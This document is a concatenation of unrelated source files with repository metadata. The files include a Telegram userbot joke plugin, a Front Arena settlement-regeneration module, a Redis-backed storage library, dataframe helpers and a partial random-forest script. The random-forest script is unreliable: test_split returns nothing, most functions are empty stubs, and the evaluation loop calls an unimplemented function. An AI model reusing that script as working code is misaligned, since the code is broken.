            model_name = 'ft_pgn'
        else:
            model_name = 'cov_pgn'
    elif scheduled_sampling:
        model_name = 'ss_pgn'
    elif weight_tying:
        model_name = 'wt_pgn'
    else:
        if source == 'big_samples':
            model_name = 'pgn_big_samples'
        else:
            model_name = 'pgn'
else:
    model_name = 'baseline'
| [
"deco_2004@163.com"
] | deco_2004@163.com |
caa70a1c20c09c9c6b6377119336bac1cfa74b9e | 7ef2e648c7d256a5b2b867eb0562da4a482de164 | /polygraph/types/tests/test_union.py | 5ff82e4f688f1a5ad8a2f07bf95688f10ae7cbcc | [
"MIT"
] | permissive | pombredanne/polygraph-3 | 6a57c60835dcbf1dfde5f5893160c3d9c08b9dbe | f6b187e23f3c5adc8571ea844ec95e69451831f8 | refs/heads/master | 2021-01-24T08:21:57.822485 | 2017-05-19T11:45:06 | 2017-05-19T11:45:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | # FIXME: Unions can only accept Object Types
| [
"wlee@mathspace.co"
] | wlee@mathspace.co |
ca6ae37debcd45faf6aa52776adf01ee5c14bd29 | 729c7fa3b4b357b270378113b490c52d47aa5bda | /stdplugins/call.py | 4c09b1bac8886ff22cb5a9337bc294e89008b1b5 | [
"Apache-2.0"
] | permissive | Hopsins/PornHub | 277ba3104ea4e4b5955871656558edde97f6ef4c | eb4eed9e18bdace04a948321186804330e809ddd | refs/heads/master | 2020-07-09T16:00:01.660358 | 2019-08-22T16:35:35 | 2019-08-22T16:35:35 | 199,866,577 | 0 | 0 | Apache-2.0 | 2019-07-31T13:56:02 | 2019-07-31T13:56:01 | null | UTF-8 | Python | false | false | 1,813 | py | """Emoji
Available Commands:
.emoji shrug
.emoji apple
.emoji :/
.emoji -_-"""
from telethon import events
import asyncio
# Matches every outgoing message starting with '.' and captures the rest.
# NOTE(review): despite the module docstring mentioning '.emoji', this
# handler only acts when the captured text is exactly "/cull" (i.e. the
# user typed "./cull") -- confirm the intended trigger.
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
    # Ignore forwarded messages.
    if event.fwd_from:
        return
    # Seconds between animation frames, and the number of frames (18).
    animation_interval = 5
    animation_ttl = range(0, 18)
    input_str = event.pattern_match.group(1)
    if input_str == "/cull":
        await event.edit(input_str)
        # One message edit per frame of the joke "call" transcript.
        animation_chars = [
            "`Connecting To Telegram Headquarters...`",
            "`Call Connected.`",
            "`Telegram: Hello This is Telegram HQ. Who is this?`",
            "`Me: Yo this is` @r4v4n4 ,`Please Connect me to Pavel Durov Shukla`",
            "`User Authorised.`",
            "`Calling Pavel Durov Shukla (@durov) At +916969696969`",
            "`Private Call Connected...`",
            "`Me: Hello Sir, Please Ban This Telegram Account.`",
            "`Durov: May I Know Who Is This?`",
            "`Me: Yo Brah, I Am` @r4v4n4",
            "`Durov: OMG!!! I Am FAN Of You Sir...\nI'll Make Sure That Guy Account Will Get Blocked Within 24Hrs.`",
            "`Me: Thanks, See You Later Brah.`",
            "`Durov: Please Don't Thank Sur, Telegram Is Your's. Just Gimme A Call When You Become Free.`",
            "`Me: Is There Any Issue/Emergency???`",
            "`Durov: Yes Sur, There Is A Bug In Telegram v5.8.0.\nI Am Not Able To Fix It. If Possible, Please Help Fix The Bug.`",
            "`Me: Send Me The App On My Telegram Account, I Will Fix The Bug & Send You.`",
            "`Durov: Sure Sur \nTC Bye Bye :)`",
            "`Private Call Disconnected.`"
        ]
        for i in animation_ttl:
            await asyncio.sleep(animation_interval)
            # i % 18 is a no-op here since the range already covers 0..17.
            await event.edit(animation_chars[i % 18])
| [
"noreply@github.com"
] | Hopsins.noreply@github.com |
01e664b7f39575e1a63a4ddf8b5dfefab7300952 | a2e638cd0c124254e67963bda62c21351881ee75 | /Python modules/SettlementRegenerate.py | f5f2ad83e3c14991b4f4775c28b52ee0110c5cdb | [] | no_license | webclinic017/fa-absa-py3 | 1ffa98f2bd72d541166fdaac421d3c84147a4e01 | 5e7cc7de3495145501ca53deb9efee2233ab7e1c | refs/heads/main | 2023-04-19T10:41:21.273030 | 2021-05-10T08:50:05 | 2021-05-10T08:50:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,110 | py | """----------------------------------------------------------------------------------------------------------
MODULE : SettlementRegenerate
PURPOSE : This module will regenerate a settlement.
DEPARTMENT AND DESK : IT
REQUASTER : Heinrich Cronje
DEVELOPER : Heinrich Cronje
CR NUMBER :
-------------------------------------------------------------------------------------------------------------
HISTORY
=============================================================================================================
Date Change no Developer Description
-------------------------------------------------------------------------------------------------------------
2011-08-22 Heinrich Cronje Front Arena Upgrade 2010.2.
2019-07-24 FAU-312 Cuen Edwards Replaced custom regenerate functionality with
call to Front Arena command. Added security
on menu item.
-------------------------------------------------------------------------------------------------------------
"""
import acm
from at_logging import getLogger
import FUxCore
LOGGER = getLogger(__name__)
def _confirm_regenerate(shell, settlements):
    """
    Ask the user to confirm regeneration of the currently selected
    settlements.  Returns True when the user answers Yes.
    """
    count = settlements.Size()
    if count == 1:
        subject = "selected settlement."
    elif count > 1:
        subject = "{number} selected settlements.".format(number=count)
    else:
        subject = ""
    prompt = ("The command Regenerate will be executed on the "
              + subject
              + "\n\nDo you want to continue?")
    answer = acm.UX.Dialogs().MessageBoxYesNo(shell, 'Question', prompt)
    return answer == 'Button1'
def _regenerate(settlements):
"""
Regenerate the specified settlements.
"""
failures = {}
for settlement in settlements:
try:
command = acm.FRegeneratePayment(settlement)
command.Execute()
command.CommitResult()
LOGGER.info('Regenerated settlement {oid}.'.format(
oid=settlement.Oid()
))
except Exception as exception:
failures[settlement] = exception
LOGGER.warn('Failed to regenerate settlement {oid}.'.format(
oid=settlement.Oid()
))
return failures
def _display_failures(shell, failures):
"""
Display a list of settlements that failed to regenerate along
with the associated exceptions.
"""
settlements = list(failures.keys())
settlements.sort(key=lambda s: s.Oid())
message = "The following settlements failed to regenerate:\n"
for settlement in settlements:
message += "\n- {oid} - {exception}".format(
oid=settlement.Oid(),
exception=failures[settlement]
)
acm.UX.Dialogs().MessageBoxOKCancel(shell, 'Warning', message)
class MenuItem(FUxCore.MenuItem):
"""
Menu item used to trigger the 'Regenerate Payment' command.
"""
def __init__(self, extension_object):
"""
Constructor.
"""
pass
@FUxCore.aux_cb
def Invoke(self, eii):
"""
Perform the action on the menu item being invoked.
"""
if not self._user_has_access():
return
shell = eii.Parameter('shell')
settlements = eii.ExtensionObject()
if _confirm_regenerate(shell, settlements):
failures = _regenerate(settlements)
if len(failures) > 0:
_display_failures(shell, failures)
@FUxCore.aux_cb
def Applicable(self):
"""
Determine whether or not the menu item should be visible
(shown at all).
"""
return self._user_has_access()
@FUxCore.aux_cb
def Enabled(self):
"""
Determine whether or not the menu item should be enabled
(vs greyed-out).
"""
return self._user_has_access()
@FUxCore.aux_cb
def Checked(self):
"""
Determine whether or not the menu item should be checked
(have a check mark).
"""
return False
@staticmethod
def _user_has_access():
"""
Determine whether or not a user should have access to the
menu item.
"""
if not acm.User().IsAllowed('Authorise Settlement', 'Operation'):
return False
if not acm.User().IsAllowed('Edit Settlements', 'Operation'):
return False
if not acm.User().IsAllowed('Regenerate Settlement', 'Operation'):
return False
return True
@FUxCore.aux_cb
def create_menu_item(extension_object):
"""
Function used to create and return the menu item.
This function is referenced from the 'Regenerate Payment'
FMenuExtension.
"""
return MenuItem(extension_object)
| [
"nencho.georogiev@absa.africa"
] | nencho.georogiev@absa.africa |
6e78e850f434cb525cb6b9cfd99f77b713019d67 | c50d9494ceb94c336d8c702f183fdd42b790fcbc | /Day-20/DecisionTree/Python/DecisionTree.py | c62792535fd7bc4c63279181e7cdaf64dd8b7224 | [] | no_license | sahilkumar4all/HMRTraining | 6469d9c566b453f73bb002306a0b231e63a1a30a | 1bb06b1e57977f209af7917385297842979add69 | refs/heads/master | 2020-06-05T16:02:51.339065 | 2019-07-30T06:27:57 | 2019-07-30T06:27:57 | 192,479,150 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,151 | py | from random import seed
from random import randrange
from csv import reader
from math import sqrt
# Load a CSV file
def load_csv(filename):
    """Read a CSV file and return its rows as lists of strings.

    Blank lines are skipped.
    """
    with open(filename, 'r') as handle:
        return [row for row in reader(handle) if row]
def str_to_float(dataset):
    """Convert every cell of every row to float, in place."""
    for row in dataset:
        row[:] = [float(cell) for cell in row]
def cross_validation_split(dataset, n_folds):
    """Randomly partition dataset into n_folds folds of equal size.

    Sampling is without replacement; leftover rows (when the length is
    not divisible by n_folds) are simply dropped.
    """
    pool = list(dataset)
    fold_size = len(dataset) // n_folds
    folds = []
    for _ in range(n_folds):
        fold = []
        while len(fold) < fold_size:
            fold.append(pool.pop(randrange(len(pool))))
        folds.append(fold)
    return folds
# Calculate accuracy percentage
def accuracy_metric(actual, predicted):
    """Return the percentage of predictions that match the actual labels."""
    matches = [actual[i] == predicted[i] for i in range(len(actual))]
    return sum(matches) / float(len(actual)) * 100.0
# Evaluate an algorithm using a cross validation split
def evaluate_algorithm(dataset, algorithm, n_folds, *args):
    """Score `algorithm` with k-fold cross validation.

    For each fold: train on the other folds, predict the fold with its
    labels blanked out, and record the accuracy.  Returns the list of
    per-fold accuracy percentages.
    """
    folds = cross_validation_split(dataset, n_folds)
    scores = list()
    for fold in folds:
        # Copy the fold list and drop the current fold by identity.
        train_set = list(folds)
        train_set.remove(fold)
        # Flatten the remaining folds into a single training list.
        train_set = sum(train_set, [])
        test_set = list()
        #add each row in a given subsample to the test set
        for row in fold:
            # Copy each row so blanking the label does not touch `dataset`.
            row_copy = list(row)
            test_set.append(row_copy)
            row_copy[-1] = None
        predicted = algorithm(train_set, test_set, *args)
        # print(predicted)
        actual = [row[-1] for row in fold]
        accuracy = accuracy_metric(actual, predicted)
        scores.append(accuracy)
    return scores
def gini_index(class_values, groups):
    """Sum of per-group, per-class Gini impurity terms for a split.

    For each class and each non-empty group, adds p * (1 - p) where p
    is the fraction of the group's rows carrying that class label.
    """
    gini = 0.0
    for class_value in class_values:
        for group in groups:
            if not group:
                # Empty group contributes nothing (and avoids 0-division).
                continue
            labels = [row[-1] for row in group]
            proportion = labels.count(class_value) / float(len(group))
            gini += proportion * (1.0 - proportion)
    return gini
def test_split(value,index, dataset):
left, right = list(), list()
for row in dataset:
if row[index] < value:
left.append(row)
else:
right.append(row)
def get_split(dataset, n_features):
    """Find the best split among n_features randomly chosen attributes,
    scored by Gini index (lower is better).

    Returns {'index': attr, 'value': threshold, 'groups': (left, right)}.

    BUG FIX: the original called randrange(len(dataset[0] - 1)), which
    subtracts 1 from the row *list* itself and raises TypeError; the
    subtraction belongs outside len().
    """
    class_values = list(set([row[-1] for row in dataset]))
    b_index, b_value, b_score, b_groups = 999, 999, 999, None
    # Sample n_features distinct attribute indices (label column excluded).
    features = list()
    while len(features) < n_features:
        index = randrange(len(dataset[0]) - 1)
        if index not in features:
            features.append(index)
    # Evaluate every row value of every sampled attribute as a threshold.
    for index in features:
        for row in dataset:
            groups = test_split(row[index], index, dataset)
            gini = gini_index(class_values, groups)
            if gini < b_score:
                b_index, b_value, b_score, b_groups = index, row[index], gini, groups
    return {'index': b_index, 'value': b_value, 'groups': b_groups}
def to_terminal():
    """TODO: not implemented -- should yield a terminal node value."""
    pass
def split():
    """TODO: not implemented -- should recursively split a node."""
    pass
def build_tree():
    """TODO: not implemented -- should build a single decision tree."""
    pass
def predict():
    """TODO: not implemented -- should predict with one tree."""
    pass
def bagged_predict():
    """TODO: not implemented -- should aggregate tree predictions."""
    pass
def random_forest():
    """TODO: not implemented -- should train/predict the forest."""
    pass
# Toy two-class dataset: two float features plus the class label (0/1).
dataset = [
    [2.7810836,2.550537003,0],
    [1.465489372,2.362125076,0],
    [3.396561688,4.400293529,0],
    [1.38807019,1.850220317,0],
    [3.06407232,3.005305973,0],
    [7.627531214,2.759262235,1],
    [5.332441248,2.088626775,1],
    [6.922596716,1.77106367,1],
    [8.675418651,-0.242068655,1],
    [7.673756466,3.508563011,1]
]
# str_to_float(dataset)
n_folds = 5
max_depth = 10
min_size = 1
sample_size = 1.0
# Standard random-forest heuristic: sqrt of the number of attributes.
n_features = int(sqrt(len(dataset[0])-1))
print("Number of features",n_features)
# NOTE(review): random_forest above is still a 'pass' stub returning
# None, so this evaluation loop cannot run to completion as written.
for n_trees in [1, 5, 10]:
    scores = evaluate_algorithm(dataset, random_forest, n_folds, max_depth, min_size, sample_size, n_trees, n_features)
    print('Trees: %d' % n_trees)
    print('Scores: %s' % scores)
    print('Mean Accuracy: %.3f%%' % (sum(scores)/float(len(scores))))
"sahilk8285174895@gmail.com"
] | sahilk8285174895@gmail.com |
3b678ef6eb9e54417b8208f7f217443f139f13f4 | 9d6f79f2dd320347deee2e4514253c6bf9bbe821 | /lista1/zad1l1.py | 9f447f2b5378f7c5a7d924d3223c76cd76427ed6 | [] | no_license | poduszeczka3/JSP2019 | 2fa8c9b7fe10c49f14809d2b08b1fc2a12d80ed9 | 7d010415af47a0c15b009a6d0c48a8569a211ef0 | refs/heads/master | 2020-08-27T22:07:16.480123 | 2020-01-22T21:46:13 | 2020-01-22T21:46:13 | 214,391,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | print("podaj a")
a=input()
print("podaj b")
b=input()
suma=a+b
print(suma)
print("Dzięki funkcji Input zmienne 'a' oraz 'b' są traktowane jako tekst (typ: str), więc po dodaniu tworzą tekst '34'") | [
"lha120-n11@wp.pl"
] | lha120-n11@wp.pl |
e3407732dc3167a6f2ac4a77998f57b096c238ef | 30f3d476b7b8e21a1dd3209f8485c0debafb51a4 | /Experiment3/datasketch-master/datasketch-master/datasketch/storage.py | c96e7bfdf28c226244e30611057f09cb94ea5980 | [
"MIT"
] | permissive | ConquerorWolverine/Data_analysis | 3b61aa4cf6e60a5cb4d554c5ef1d7b2bf01e89c0 | 97e11f66cc51b6c976dd1043c8465f3f6c10a0a5 | refs/heads/master | 2020-11-24T18:41:41.777920 | 2019-12-18T03:29:43 | 2019-12-18T03:29:43 | 228,295,456 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,619 | py | from collections import defaultdict
import os
import random
import string
from abc import ABCMeta, abstractmethod
ABC = ABCMeta('ABC', (object,), {}) # compatible with Python 2 *and* 3
try:
import redis
except ImportError:
redis = None
def ordered_storage(config, name=None):
    '''Create an ordered (list-valued) storage backend.

    ``config['type']`` selects the backend: ``'dict'`` yields the
    in-memory ``defaultdict(list)`` wrapper, ``'redis'`` yields the
    Redis-backed storage (configured via ``config['redis']``, whose
    parameters may reference environment variables).  Any other type
    yields None.

    Args:
        config (dict): storage configuration; must contain ``'type'``.
        name (bytes, optional): reference name for the container.
            Ignored by dict backends; used as a Redis key prefix.
    '''
    storage_type = config['type']
    if storage_type == 'dict':
        return DictListStorage(config)
    if storage_type == 'redis':
        return RedisListStorage(config, name=name)
def unordered_storage(config, name=None):
    '''Create an unordered (set-valued) storage backend.

    ``config['type']`` selects the backend: ``'dict'`` yields the
    in-memory ``defaultdict(set)`` wrapper, ``'redis'`` yields the
    Redis-backed storage (configured via ``config['redis']``, whose
    parameters may reference environment variables).  Any other type
    yields None.

    Args:
        config (dict): storage configuration; must contain ``'type'``.
        name (bytes, optional): reference name for the container.
            Ignored by dict backends; used as a Redis key prefix.
    '''
    storage_type = config['type']
    if storage_type == 'dict':
        return DictSetStorage(config)
    if storage_type == 'redis':
        return RedisSetStorage(config, name=name)
class Storage(ABC):
    '''Base class for key, value containers where the values are sequences.'''
    def __getitem__(self, key):
        '''Dict-style access; delegates to get().'''
        return self.get(key)
    def __delitem__(self, key):
        '''Dict-style deletion; delegates to remove().'''
        return self.remove(key)
    def __len__(self):
        '''Number of keys; delegates to size().'''
        return self.size()
    def __iter__(self):
        '''Iterate over the keys.'''
        for key in self.keys():
            yield key
    def __contains__(self, item):
        '''Key membership test; delegates to has_key().'''
        return self.has_key(item)
    @abstractmethod
    def keys(self):
        '''Return an iterator on keys in storage'''
        return []
    @abstractmethod
    def get(self, key):
        '''Get list of values associated with a key
        Returns empty list ([]) if `key` is not found
        '''
        pass
    def getmany(self, *keys):
        '''Return the list of value-sequences for each of `keys`.'''
        return [self.get(key) for key in keys]
    @abstractmethod
    def insert(self, key, *vals, **kwargs):
        '''Add `val` to storage against `key`'''
        pass
    @abstractmethod
    def remove(self, *keys):
        '''Remove `keys` from storage'''
        pass
    @abstractmethod
    def remove_val(self, key, val):
        '''Remove `val` from list of values under `key`'''
        pass
    @abstractmethod
    def size(self):
        '''Return size of storage with respect to number of keys'''
        pass
    @abstractmethod
    def itemcounts(self, **kwargs):
        '''Returns the number of items stored under each key'''
        pass
    @abstractmethod
    def has_key(self, key):
        '''Determines whether the key is in the storage or not'''
        pass
    def status(self):
        '''Return basic status information (currently the key count).'''
        return {'keyspace_size': len(self)}
    def empty_buffer(self):
        '''Flush any buffered writes; no-op for unbuffered backends.'''
        pass
class OrderedStorage(Storage):
    '''Marker base class for storages whose per-key values preserve
    insertion order (list-like semantics). Behaviour lives in subclasses.'''
    pass
class UnorderedStorage(Storage):
    '''Marker base class for storages whose per-key values are unordered
    sets (duplicates collapse). Behaviour lives in subclasses.'''
    pass
class DictListStorage(OrderedStorage):
    '''In-memory ordered storage backed by ``defaultdict(list)``,
    adapted to the `Storage` interface.
    '''

    def __init__(self, config):
        # The config is unused for in-memory storage; accepted for
        # interface parity with the Redis backends.
        self._dict = defaultdict(list)

    def keys(self):
        return self._dict.keys()

    def get(self, key):
        # Missing keys yield an empty list rather than raising or
        # creating a new entry.
        return self._dict.get(key, [])

    def remove(self, *keys):
        # Raises KeyError on a missing key, matching plain `del`.
        for k in keys:
            del self._dict[k]

    def remove_val(self, key, val):
        self._dict[key].remove(val)

    def insert(self, key, *vals, **kwargs):
        self._dict[key].extend(vals)

    def size(self):
        return len(self._dict)

    def itemcounts(self, **kwargs):
        '''Map each key of the container to the *length* of the value
        sequence stored under it.'''
        counts = {}
        for k, v in self._dict.items():
            counts[k] = len(v)
        return counts

    def has_key(self, key):
        return key in self._dict
class DictSetStorage(UnorderedStorage, DictListStorage):
    '''In-memory unordered storage backed by ``defaultdict(set)``.

    Reuses the `DictListStorage` machinery, overriding only the parts
    where set semantics differ from list semantics.
    '''

    def __init__(self, config):
        # Config is accepted for interface parity but unused in memory.
        self._dict = defaultdict(set)

    def get(self, key):
        # Avoid self._dict[key] here: that would create an empty entry
        # for a missing key via the defaultdict factory.
        if key in self._dict:
            return self._dict[key]
        return set()

    def insert(self, key, *vals, **kwargs):
        self._dict[key].update(vals)
if redis is not None:
    # Only defined when the optional `redis` package imported successfully.
    class RedisBuffer(redis.client.Pipeline):
        '''A bufferized version of `redis.pipeline.Pipeline`.
        The only difference from the conventional pipeline object is the
        ``buffer_size``. Once the buffer is longer than the buffer size,
        the pipeline is automatically executed, and the buffer cleared.
        '''
        def __init__(self, connection_pool, response_callbacks, transaction,
                     shard_hint=None, buffer_size=50000):
            # buffer_size: maximum number of queued commands before an
            # automatic flush via execute().
            self.buffer_size = buffer_size
            super(RedisBuffer, self).__init__(
                connection_pool, response_callbacks, transaction,
                shard_hint=shard_hint)
        def execute_command(self, *args, **kwargs):
            # Flush first if the pending command stack is already full,
            # then queue the new command on the pipeline.
            # NOTE(review): the superclass result is not returned here, so
            # callers cannot use this pipeline's per-command return value.
            if len(self.command_stack) >= self.buffer_size:
                self.execute()
            super(RedisBuffer, self).execute_command(*args, **kwargs)
class RedisStorage:
    '''Base class for Redis-based storage containers.

    Args:
        config (dict): Redis storage units require a configuration
            of the form::

                storage_config={
                    'type': 'redis',
                    'redis': {'host': 'localhost', 'port': 6379}
                }

            one can refer to system environment variables via::

                storage_config={
                    'type': 'redis',
                    'redis': {
                        'host': {'env': 'REDIS_HOSTNAME',
                                 'default':'localhost'},
                        'port': 6379}
                    }
                }

        name (bytes, optional): A prefix to namespace all keys in
            the database pertaining to this storage container.
            If None, a random name will be chosen.
    '''

    def __init__(self, config, name=None):
        self.config = config
        redis_param = self._parse_config(self.config['redis'])
        self._redis = redis.Redis(**redis_param)
        self._buffer = RedisBuffer(self._redis.connection_pool,
                                   self._redis.response_callbacks,
                                   transaction=True)
        if name is None:
            name = _random_name(11)
        self._name = name

    def redis_key(self, key):
        # Namespace every key with this container's name prefix.
        return self._name + key

    def _parse_config(self, config):
        '''Resolve a raw config dict, expanding ``{'env': ..., 'default': ...}``
        entries from the process environment.

        This indirection lets the database relocate to a different host
        during the lifetime of the LSH object.
        '''
        resolved = {}
        for key, value in config.items():
            # A dict-valued entry names an environment variable (under
            # 'env') with an optional fallback (under 'default'). Any
            # other value is taken literally.
            if isinstance(value, dict) and 'env' in value:
                value = os.getenv(value['env'], value.get('default', None))
            resolved[key] = value
        return resolved

    def __getstate__(self):
        # Connection objects cannot be pickled; drop them here and
        # rebuild them on unpickling in __setstate__.
        state = dict(self.__dict__)
        del state['_redis']
        del state['_buffer']
        return state

    def __setstate__(self, state):
        self.__dict__ = state
        # Re-run __init__ to reconnect using the stored config and name.
        self.__init__(self.config, name=self._name)
class RedisListStorage(OrderedStorage, RedisStorage):
    '''Redis-backed ordered storage.

    Each logical key maps to a Redis list (insertion order preserved).
    A Redis hash stored under ``self._name`` tracks the set of logical
    keys by mapping each logical key to its namespaced Redis key.
    '''

    def __init__(self, config, name=None):
        RedisStorage.__init__(self, config, name=name)

    def keys(self):
        # Logical keys are the fields of the bookkeeping hash.
        return self._redis.hkeys(self._name)

    def redis_keys(self):
        # Namespaced Redis keys are the values of the bookkeeping hash.
        return self._redis.hvals(self._name)

    def status(self):
        status = self._parse_config(self.config['redis'])
        status.update(Storage.status(self))
        return status

    def get(self, key):
        return self._get_items(self._redis, self.redis_key(key))

    def getmany(self, *keys):
        # Batch all reads into one round trip via a transactional pipeline.
        pipe = self._redis.pipeline()
        pipe.multi()
        for key in keys:
            pipe.lrange(self.redis_key(key), 0, -1)
        return pipe.execute()

    @staticmethod
    def _get_items(r, k):
        return r.lrange(k, 0, -1)

    def remove(self, *keys):
        self._redis.hdel(self._name, *keys)
        self._redis.delete(*[self.redis_key(key) for key in keys])

    def remove_val(self, key, val):
        redis_key = self.redis_key(key)
        # NOTE(review): redis-py >= 3.0 changed the signature to
        # lrem(name, count, value); this two-argument call matches
        # redis-py 2.x -- confirm the pinned client version.
        self._redis.lrem(redis_key, val)
        if not self._redis.exists(redis_key):
            # Bugfix: the bookkeeping hash stores fields under the logical
            # key (see _insert), not the namespaced redis_key. Deleting by
            # redis_key left a stale entry, so the emptied key kept
            # appearing in keys()/size().
            self._redis.hdel(self._name, key)

    def insert(self, key, *vals, **kwargs):
        # Using buffer=True outside of an `insertion_session` could lead
        # to inconsistencies, because those insertions will not be
        # processed until the buffer is cleared.
        buffer = kwargs.pop('buffer', False)
        if buffer:
            self._insert(self._buffer, key, *vals)
        else:
            self._insert(self._redis, key, *vals)

    def _insert(self, r, key, *values):
        redis_key = self.redis_key(key)
        # Register the logical key in the bookkeeping hash, then append
        # the values to the namespaced list.
        r.hset(self._name, key, redis_key)
        r.rpush(redis_key, *values)

    def size(self):
        return self._redis.hlen(self._name)

    def itemcounts(self):
        # One pipelined round trip to get the length of every list.
        pipe = self._redis.pipeline()
        pipe.multi()
        ks = self.keys()
        for k in ks:
            self._get_len(pipe, self.redis_key(k))
        d = dict(zip(ks, pipe.execute()))
        return d

    @staticmethod
    def _get_len(r, k):
        return r.llen(k)

    def has_key(self, key):
        return self._redis.hexists(self._name, key)

    def empty_buffer(self):
        self._buffer.execute()
        # To avoid broken pipes, recreate the connection objects upon
        # emptying the buffer.
        self.__init__(self.config, name=self._name)
class RedisSetStorage(UnorderedStorage, RedisListStorage):
    '''Redis-backed unordered storage.

    Same bookkeeping scheme as `RedisListStorage`, but each logical key
    maps to a Redis set rather than a list (duplicates collapse, no
    ordering guarantees).
    '''

    def __init__(self, config, name=None):
        RedisListStorage.__init__(self, config, name=name)

    @staticmethod
    def _get_items(r, k):
        return r.smembers(k)

    def remove_val(self, key, val):
        redis_key = self.redis_key(key)
        self._redis.srem(redis_key, val)
        if not self._redis.exists(redis_key):
            # Bugfix: delete the bookkeeping-hash field by the logical key
            # (the field name used by _insert), not the namespaced
            # redis_key, so emptied keys no longer linger in keys()/size().
            self._redis.hdel(self._name, key)

    def _insert(self, r, key, *values):
        redis_key = self.redis_key(key)
        # Register the logical key, then add the values to the set.
        r.hset(self._name, key, redis_key)
        r.sadd(redis_key, *values)

    @staticmethod
    def _get_len(r, k):
        return r.scard(k)
def _random_name(length):
# For use with Redis, we return bytes
return ''.join(random.choice(string.ascii_lowercase)
for _ in range(length)).encode('utf8')
| [
"ConquerorWolverine@users.noreply.github.com"
] | ConquerorWolverine@users.noreply.github.com |
4dc221fddba3db1f5c8d5ed32f90622be7764621 | 80bc45b33f5282ef530fc8db208ba1528e7328b3 | /dataframe/version.py | e5848e1b65504f9848a83fd0b35446f3fd3bf984 | [] | no_license | SynapticSage/Tetromate_GoogleAssistantApplication | 5c8d185bb58bddb7d8c674e06b2e35db59a2675d | 127719b09f714d87a50b13681118fcc1f4e3bd13 | refs/heads/master | 2023-08-15T18:49:55.597746 | 2021-10-12T21:52:21 | 2021-10-12T21:52:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | # For updating older versions of the dataframe to newer versions
from tetromate_webserver import ExperimateLogger
from typing import Union
import pandas as pd
import numpy as np
def ready(df):
    '''Return *df*, upgraded if any 'entrance' row still lacks a tetrode.

    A tetrode is considered missing when it is NaN or the legacy -1
    placeholder; in that case the upgraded copy is returned, otherwise
    *df* is returned unchanged.
    '''
    entrance_tetrodes = df.query('intent == "entrance"').tetrode
    needs_upgrade = (
        entrance_tetrodes.isnull().any()
        or (entrance_tetrodes == -1).any()
    )
    if needs_upgrade:
        df = upgrade_to_tetrode_labeled_entrance(df)
    return df
def upgrade_to_tetrode_labeled_entrance(df: pd.DataFrame,
                                        fix_negative_one_default_values=True):
    '''
    Newer versions annotate the tetrode for the entrance, rather than leaving
    it blank. Blank entries were assumed to have the tetrode of whichever
    previous entry notated tetrode.

    Args:
        df: Log dataframe with at least 'intent' and 'tetrode' columns.
        fix_negative_one_default_values: If True, treat the legacy -1
            placeholder in 'tetrode' as missing before filling forward.

    Returns:
        A copy of *df* (with its index reset) where 'entrance' rows carry
        the tetrode of the most recent preceding row that had one.
    '''
    df = df.copy()
    df = df.reset_index()
    if fix_negative_one_default_values:
        # Bugfix: the old chained assignment
        # (x = df.loc[:, 'tetrode']; x[mask] = nan) wrote to a possible
        # copy, so -1 placeholders could survive into the forward fill.
        # Assign through df.loc in a single step instead.
        df.loc[df.tetrode == -1, 'tetrode'] = np.nan
    # Pass tetrodes ahead into nan entries. Assign the filled column back
    # explicitly: chained Series.ffill(inplace=True) does not update the
    # frame under pandas copy-on-write.
    df_fillforward = df.copy()
    df_fillforward['tetrode'] = df_fillforward['tetrode'].ffill()
    # Extract entries related to entrances
    chunk = df_fillforward[df_fillforward.intent == "entrance"]
    df.loc[chunk.index, 'tetrode'] = chunk.tetrode
    return df
| [
"ryoung@archer.feldmach.brandeis.edu"
] | ryoung@archer.feldmach.brandeis.edu |
a87b8deacee2e93a1005d2fc79a35606d155ee34 | de1a4823b44484a16e84229ef6d4c2218cebc240 | /eva_storage/src/evaluate_compression.py | 88957e992ede4f097666ed25a0086846ed9fa9b3 | [
"Apache-2.0"
] | permissive | jaehobang/Eva | b5baca7f91e3c6c6d439573430485afdfa3c05e8 | e7f649990b8bca3bc29b3832c0ecf32efb402647 | refs/heads/master | 2020-07-11T13:05:42.284943 | 2020-04-14T21:17:38 | 2020-04-14T21:17:38 | 204,546,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,974 | py | """
This file is used to evaluate the compression method of the pipeline
@Jaeho Bang
"""
import numpy as np
from loaders.uadetrac_loader import UADetracLoader
from eva_storage.preprocessingModule import PreprocessingModule
from eva_storage.UNet import UNet
from eva_storage.clusterModule import ClusterModule
from filters.minimum_filter import FilterMinimum
def get_rep_frames(images: np.ndarray, labels, image_cluster_labels):
    '''Pick one representative frame (and label) per cluster.

    The representative of a cluster is the first frame, in index order,
    assigned to that cluster. Output arrays are indexed by cluster number
    (0..max); clusters that never appear keep zero-filled slots.

    Returns:
        (rep_images, rep_labels) as numpy arrays.
    '''
    _, height, width, channels = images.shape
    n_clusters = max(image_cluster_labels) + 1
    rep_images = np.zeros(shape=(n_clusters, height, width, channels))
    rep_labels = np.zeros(shape=(n_clusters,))
    seen = set()
    for idx, cluster in enumerate(image_cluster_labels):
        if cluster in seen:
            continue
        # First occurrence wins for this cluster.
        seen.add(cluster)
        rep_images[cluster] = images[idx]
        rep_labels[cluster] = labels[idx]
    return rep_images, rep_labels
if __name__ == "__main__":
### deprecated... moved to ipynb file
"""
loader = LoaderUADetrac()
images = loader.load_cached_images()
labels = loader.load_cached_labels()
video_start_indices = loader.get_video_start_indices()
pm = PreprocessingModule()
seg_images = pm.run(images,video_start_indices)
unet = UNet()
unet.train(images, seg_images)
unet_compressed_images, unet_segmented_images = unet.execute()
cm = ClusterModule()
image_cluster_labels = cm.run(unet_compressed_images)
rep_images, rep_labels = get_rep_frames(images, labels['vehicle'], image_cluster_labels)
## TODO: Chose the representative frames... now need to do custom_code with filters
# init a filter instance that is trained on all images
fm_everyframe = FilterMinimum()
fm_everyframe.train(images, labels['vehicle'])
fm_repframe = FilterMinimum()
fm_repframe.train(rep_images, rep_labels)
"""
| [
"jaehob@andrew.cmu.edu"
] | jaehob@andrew.cmu.edu |
